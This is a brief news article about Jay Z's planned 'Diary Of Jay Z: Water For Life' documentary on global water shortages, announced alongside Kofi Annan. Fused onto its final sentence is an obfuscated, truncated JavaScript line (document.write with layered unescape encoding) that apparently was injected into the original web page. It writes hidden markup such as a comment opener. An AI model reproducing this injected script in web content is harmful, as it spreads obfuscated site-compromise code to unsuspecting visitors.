Jay Z is to embark on a tour of the countries most seriously affected by water shortages in a bid to highlight the issue.
The rap superstar has announced plans to make a documentary about his journey, which will begin in Turkey and focus on lack of safe drinking water globally.
At a press conference in New York City, which was also attended by United Nations Secretary General Kofi Annan, he outlined his plans for "Diary Of Jay Z: Water For Life" .
"In the beginning, when I was going out on a world tour, I was going out to play music," he commented.
"But I said to myself, I can't go to these places I've been and not go out and see the people that have been touched by my music for over 10 years.
"From that morphed, 'Well, I'm not just going to go over there and rap to them.' I'm going to help and see what I can do in these areas."
Jay, who also embarks on a brief UK tour next month, continued: "Every 15 seconds a child dies from not having clean water.
"That's just staggering numbers and I figured that if the information was out and young people knew that these problems exist that they'd get involved."
"Diary Of Jay Z: Water For Life" will air on MTV in November.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
